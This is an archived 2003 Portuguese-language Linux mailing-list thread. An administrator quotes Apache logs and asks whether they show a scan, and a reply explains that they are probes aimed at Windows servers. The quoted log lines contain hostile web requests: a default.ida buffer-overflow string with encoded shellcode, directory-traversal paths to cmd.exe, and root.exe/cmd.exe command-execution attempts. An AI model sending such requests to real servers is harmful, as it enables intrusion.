Concerteza e alguem ou algum trojam tentando explorar alguma
vulnerabilidade, mas pelo o que est� nos logs est� tentando como se o seu
servidor fosse um windows.
Marco Aur�lio
> Venho notado logs estranhos no apache.
> Abaixo segue algumas linhas pertinentes do access_log e do error_log
> O vem a ser isso? E algum scaneamento ou algo do tipo?
>
> No aguardo,
> Mateus Reis
>
> Erro_log:
>
> [Mon Mar 24 20:16:46 2003] [error] [client 200.171.189.177] File does not
exist:
> /var/www/html/default.ida
> [Mon Mar 24 18:06:39 2003] [error] [client 200.171.5.84] File does not
exist: /v
> ar/www/html/d/winnt/system32/cmd.exe
> [Mon Mar 24 18:06:46 2003] [error] [client 200.171.5.84] File does not
exist: /v
>
ar/www/html/msadc/..%5c../..%5c../..%5c/..�^\../..�^\../..�^\../winnt/system
32/c
> md.exe
>
> Access_log:
>
> 200.171.30.44 - - [23/Mar/2003:04:25:11 -0300] "GET
/default.ida?XXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9
090%
>
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u5
> 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
> 200.171.5.84 - - [25/Mar/2003:17:35:32 -0300] "GET
/c/winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 404 218 "-" "-"
> 200.171.5.84 - - [25/Mar/2003:17:35:26 -0300] "GET /MSADC/root.exe?/c+dir
HTTP/1
> .0" 404 208 "-" "-"
> 200.171.5.84 - - [25/Mar/2003:17:35:21 -0300] "GET
/scripts/root.exe?/c+dir HTTP
> /1.0" 404 210 "-" "-"
Assinantes em 26/03/2003: 2234
Mensagens recebidas desde 07/01/1999: 205565
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista:
mailto:[EMAIL PROTECTED]
